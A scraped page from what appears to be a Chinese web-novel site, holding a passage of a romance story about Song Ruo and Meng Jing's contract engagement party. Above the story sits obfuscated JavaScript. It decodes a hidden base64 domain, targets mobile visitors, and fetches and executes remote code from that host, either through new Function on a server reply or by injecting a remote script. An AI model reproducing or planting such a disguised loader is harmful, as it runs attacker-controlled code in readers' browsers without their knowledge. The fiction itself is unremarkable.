98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuaHN2Y2huc3ZuY3Z2ZC5jb20=','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一页
目录 | 设置
下一章

分卷(7)(2 / 2)

加入书签 | 推荐本书 | 问题反馈 |

楼下布置得尽善尽美。四处盛开的碗口大的婚礼之路,让人仿佛置身玫瑰园。

宴会采取自助餐的形式,连绵的台桌上铺着雪白的桌布。距离订婚宴开始还有两个小时,因此桌布上并没有放食物。

宋若下楼依旧心里发慌,正要扶扶手,一只白胳膊肘却及时拐到她面前,孟璟的声音响起:让你傍一下。

孟璟在她耳边说:宋小姐,别忘了契约内容,必要的时候,秀恩爱。

话音落地,楼下响起了钢琴声,琴音悠扬地飘过来。

第9章 四手联弹

盛雪的母亲是孟卫国的义女,订婚仪式这天,她携家眷早早过来孟家,看有没有什么能搭把手。盛雪在孟家的后花园里赏玩了会儿,到达前厅时,有人在演奏舒伯特。她提着裙子要上楼找孟璟去,然而一仰头,在钢琴曲温雅的节奏里,一对穿着白色礼服的新人正挽着手下楼。盛雪微微张开了嘴。她已经在电视上见过孟璟的未婚妻了,本来以为美成那样,足可恃靓行凶,已经逆天了,谁知真人还多着几分灵动□□。与此同时,她也注意到一桩自己忽视多年的事情。

江湖上人人都说孟璟魅力四射,是个祸害。也许是盛孟两家太熟悉了,她把孟璟那个纨绔样儿看惯,也就不稀罕,总在外头黑她,说那些看上抹香鲸的都是中了蛊。

直至眼下这一刻。发小站在宋若身边,竟然半点不落下风,完全地hold住了。且有种天然的cp感。

盛雪眼看着她俩一步一步下楼,咕嘟咽了咽口水,毫不夸张地说,是一对璧人了。

还有,宋若的腰好细,简直不盈一握。

宋若仿佛有点害羞还是怎么,一直没朝孟璟看。到了一楼,更是直接松开了挽着她的那只手,轻轻提着裙子,自顾自走掉了。

盛雪心里痒痒的,想去跟她打个招呼,说声久仰,于是跟着过去。

孟璟却从中间截胡了她,yo了一声:来挺早啊,到我家吃午饭还不够,还顺一顿早饭哪。

盛雪扬起脖子,一脸高傲之态,别人请我我还不去呢,这是你们家的荣幸。说完就走。

孟璟心下奇怪,看她匆匆忙忙往厨房的方向去,不由得好笑,敢情还真是来蹭饭的。自己摸摸肚子,跟着过去。

她刚走到厨房门口,听见盛雪哇了一声:没想到你是个吃货啊。

紧接着芬姨说:盛小姐也尝尝我家的手艺吧。

盛大小姐豪气干云:那我就不客气了。

杯盘碗盏磕碰的叮当脆响。孟璟跟进,只见便宜未婚妻和发小都背对着自己,正坐厨房的小方桌那儿吃东西,抬手掏着耳朵走进去。盛雪还在嘚吧嘚:宋若你吃饭都这么好看,看得人好有食欲!我要天天跟你在一起我肯定胖死了。

孟璟在她俩对面坐下,以手支颐,侧脸对着她们,眼角的余光留神打量便宜未婚妻。只见她拿起一只小小的生煎整个儿地塞进嘴里去了,吃得腮帮子微微鼓起来,眼睛还很专注地看着盘子里的另一小只,浓密而卷翘的长睫毛微微抖索着。

那副泛着傻气的样子真吃着碗里看着锅里。

她忍不住嗤地轻笑了一下。

宋若也许是听到了,动作凝固了一秒,端起杯子来喝了口牛奶。

一道电光从盛雪脑海里呼啸而过好啊,有JQ!她决定密切注意这两个人之间的化学反应。

芬姨按照孟璟以往的习惯,给她端了杯鲜榨果汁来。橙黄的果汁盛在玻璃杯里,整间屋子都跟着靓丽起来了。孟璟端着漫不经心喝了一口,手指在桌面哒哒轻敲,也不知是对盛雪说,还是对宋若说:吃得两手油汪汪,往裙子上一蹭,啧,齐活。

宋若再次手势一顿,恰好放在旁边的手机震动起来,她不动声色拿纸巾仔细地擦过手,拿了手机起身,对盛雪说了声:小雪,你慢慢吃,我去接个电话。

孟璟眉头一挑,小雪?

盛雪小鸡啄米式点头,目送她婀娜走了出去,心想,天啊,怎么这么有范儿,这哪有半点书呆子的样子,整个儿一明星范儿。

脖子该扭到了。孟璟提醒她。

盛雪转过来,嘿嘿贼笑:老实交代,你是不是做了很过分的事?你老婆怎么一直不看你的?简直没把你放在眼里。

这话戳到了孟璟的隐痛,她自己也没搞清楚,端过杯子灌了半杯果汁。

宋若接到的是时旌导演的来电,对面问她怎么样。宋若言简意赅地表示看过剧本了,觉得戏还可以。两人约定周日试戏,具体时间地点稍后以文字形式发送。时旌朗声说:其实我们都市的部分开机了,等着确定校园戏的小演员,急了一个月,也不在乎这一天两天。所幸,你们也快放暑假了。

宋若说好。

时旌在那边咦了一声:你那边,有人在弹舒伯特?宋若含糊应了一声,说待会儿去看看,旋即两人道别,各自挂了电话。

宋若想着孟璟在厨房,刚刚阴郁女主似乎笑自己吃相难看,心里头有些抗拒,就不回去了,顺着琴音去寻演奏的人。迎面是个背影,略有些眼生,穿着一身藏青色小西装,坐在那里弹得专注。原主是个懂琴的,但她不懂,只笼统地觉得这人弹得很好。因此并不上前,就静静站在那里细听,以免打搅了她。谁知她刚站定,对方却停止了演奏,侧过脸来看她。

宋若轻微吃惊,微不可察往后一退,是谢琼。

她起身走过来了,宋若也不好见了是她就逃,那不此地无银三百两嘛,因此淡然站着,朝她点了个头。谢琼低眸望着她,依旧没什么血色的脸上显露一丝微笑:今天更美了。

身后一个声音响起来:当然了,新娘子嘛。孟璟到了。

也不知道是不是宋若的错觉,她觉得这一对表姊妹中间,有点剑拔弩张的□□味儿。

宋若,化妆。孟璟难得连名带姓地叫她,而非往日不正经的未婚妻老婆宋小姐。

宋若再次向谢琼点了个头,跟着孟璟走。新鲜的食物被酒店服务生打扮的人搬到台桌上。宋若留着神,见到孟姗姗和另外一个女人搀着孟爷爷说话,那女人和盛雪脸部轮廓有几分相似,应该就是盛雪的母亲。跟着孟璟进入一间房,化妆师已经等在那里。两人的底子都极好,打底都省了,些微上个高光,刷了腮红,眼唇修饰得比较细致些,完工用了不到二十分钟。期间孟璟半句话都没说。这和平时的沉默不太一样。她好像在生气。

盛雪推门进来,告诉孟璟:抹香鲸,你收的那一帮小弟托人给你送礼来了。

孟璟靠在椅子上,唔了一声。

宋若却忽然问:抹香鲸?什么意思。

盛雪笑起来:是孟璟的小名。

宋若颔首:有什么说法吗。

孟璟看她一眼,别开脸撅了噘嘴。

盛雪笑嘻嘻地,在宋若身边坐下,正要一五一十娓娓道来,房门推开了,和盛雪有几分肖似的中年女人进来,唇边两个梨涡若隐若现,朝宋若的方向笑道:孩子,你孟爷爷找你。

盛雪跳起来猴在她身上,嗲声嗲气喊了声妈。

没规矩,起开。

宋若垂了垂眼睑,问:阿姨,孟爷爷在哪里?

孟卫国在他的书房等着宋若,她进门,就对上他慈爱的笑脸。宋若也抿唇微笑了一下,孟爷爷。

以后叫爷爷啦。老人调皮地眨眨眼。

宋若并不觉得怎样地难为情,反倒有点难过,因为她和孟璟其实是在欺骗老人家,哪怕这个谎言的出发点是善意的。老人和她招招手,让她在身边坐下,叹口气才说:委屈你了,若若,这个仪式举办得太急了,你姑姑都没能赶过来。姑姑姑父出长差在外,到了大西北。

上一页
目录
下一章
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间